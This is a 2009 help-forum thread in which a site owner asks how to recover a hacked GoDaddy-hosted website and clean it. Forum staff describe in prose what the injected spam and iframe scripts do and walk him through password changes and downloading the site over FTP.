Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

breach of my website


  • Please log in to reply
7 replies to this topic

#1 heads/tails

heads/tails

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:01:57 PM

Posted 16 June 2009 - 04:37 PM

Hey folks first timer here.. In need of All your expertise, so don't hesitate to give your best shot, for at this point of frustration I'm all ears...

Just a quick background; I've owed my site for about 10 years, only with one major problem since, having the web builders stay around long enough so when I needed help they were around, well not so! This is this domains second site version since 1999, and they (web builder) are nowhere to be found either.

So now the problem: It seems that somehow, someone has hijacked my site.

When confronting my host (Godaddy.com) they mention of my password of that site in which they host was weak and someone was able to I guess break in.

So I went to my admin. account to see if I would be able to remove the scrip and all that stuff (see below) and guess what? My admin. account page was gone! all they left was that junk below...
Also all the other pages have a scripting, and the Home page has hidden script written and also a hidden icon Ask.com.....

So what can I do to get my controls back and what can I do to remove whom ever they are, and where are they on my computer?

I have small knowledge in this sort of stuff so be kind to me when suggesting to do this or that, I am not a Geek as you all are of which I respect now :)

Thx for any help you can give, in dire need... Heads/Tails

(from the Admin page)
Warning: session_start(): Cannot send session cookie - headers already sent by (output started at /home/content/m/a/t/matrixnu/html/matrix/admin/includes/application_top.php:8) in /home/content/m/a/t/matrixnu/html/matrix/admin/includes/functions/sessions.php on line 73

Warning: session_start(): Cannot send session cache limiter - headers already sent (output started at /home/content/m/a/t/matrixnu/html/matrix/admin/includes/application_top.php:8) in /home/content/m/a/t/matrixnu/html/matrix/admin/includes/functions/sessions.php on line 73

Warning: Cannot modify header information - headers already sent by (output started at /home/content/m/a/t/matrixnu/html/matrix/admin/includes/application_top.php:8) in /home/content/m/a/t/matrixnu/html/matrix/admin/includes/functions/general.php on line 128

EDIT: Removed malicious link

Edited by garmanma, 24 June 2009 - 05:48 PM.


BC AdBot (Login to Remove)

 


#2 heads/tails

heads/tails
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:01:57 PM

Posted 24 June 2009 - 04:47 PM

I m stunned.. I actually stump all you geeks out there? I though this would be challenging but fixable for all you who love this stuff, and yet everyone is going after the easier stuff and staying away from this prob.. What's going on guys, come on! Challenge yourselves and help me out here....

#3 garmanma

garmanma

    Computer Masochist


  • Members
  • 27,809 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Cleveland, Ohio
  • Local time:01:57 PM

Posted 24 June 2009 - 05:51 PM

Not everyone in this forum is used to working with servers, HTML code and whatnot
Those that are usually don't hang around here much
I will pass this along to some other people and see if we can get you some help

Edited by garmanma, 24 June 2009 - 07:22 PM.

Mark
Posted Image
why won't my laptop work?

Having grandkids is God's way of giving you a 2nd chance because you were too busy working your butt off the 1st time around
Do not send me PMs with problems that should be posted in the forums. Keep it in the forums, so everyone benefits
Become a BleepingComputer fan: Facebook and Twitter

#4 Grinler

Grinler

    Lawrence Abrams


  • Admin
  • 43,590 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:01:57 PM

Posted 25 June 2009 - 05:00 PM

First immediately change your godaddy password to something else.

Then connect via FTP and download the entire site. Then contact godaddy and explain the site was hacked and you would like to return your hosting account to defaults so that there is no content and everything is back to how it would be if you started a new account. You could just delete all of your files, but I cant tell you what files specifically are your content and godaddy folders.

Finally, you will need to go through each of your files and see if the html contains the scripts and clean it.

Just so you know, the hack does this:

The front page of your site has been hacked to show three links that go to pharmacy sites.

Then it uses php to download and show links from a site in germany for 3 porn sites.

Then it runs two javascripts to open iframes to two sites. Both of these sites are down.

The last thing it does is use some php to try and execute commands found at another site. The file containing the commands does not do anything at this time.

#5 heads/tails

heads/tails
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:01:57 PM

Posted 27 June 2009 - 01:49 PM

Thanks Grinler for the info; unfortunately not sure on how to download; (Then connect via FTP and download the entire site.)... And also ( Finally, you will need to go through each of your files and see if the html contains the scripts and clean it) how to step though the files...

I know I'm asking a lot but no webmaster and all in the past have been a disappointment in leaving me hanging, so have tried to do the best I can with the little I know.. thanks again for all your input... Heads/Tails

#6 heads/tails

heads/tails
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:01:57 PM

Posted 27 June 2009 - 01:50 PM

I alos want to thank garmanma for putting out the word in trying to get me help... I apreciate it very much... HeadsTails

#7 garmanma

garmanma

    Computer Masochist


  • Members
  • 27,809 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Cleveland, Ohio
  • Local time:01:57 PM

Posted 27 June 2009 - 07:36 PM

Sorry we could not have been more helpful
Mark
Posted Image
why won't my laptop work?

Having grandkids is God's way of giving you a 2nd chance because you were too busy working your butt off the 1st time around
Do not send me PMs with problems that should be posted in the forums. Keep it in the forums, so everyone benefits
Become a BleepingComputer fan: Facebook and Twitter

#8 Grinler

Grinler

    Lawrence Abrams


  • Admin
  • 43,590 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:01:57 PM

Posted 29 June 2009 - 09:08 AM

Sorry for the delay. Lack of internet over the weekend :thumbsup:

To FTP your data off, log into the Godaddy and select Hosting -> My Hosting Account. Then click on the Manage account link. This will launch the control panel.

Once in the control panel click on the Content tab and then the ftp client. This will load a java based ftp client that you can use to download your site. On the left pane select/create a folder on your local comptuer to download the data. In the right pane, click on item to select, and then click on the Control+A buton on your keyboard to select everything. Then click the << button to copy the files from your godaddy account to your local computer.

Once you do that we can continue cleaning the files.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users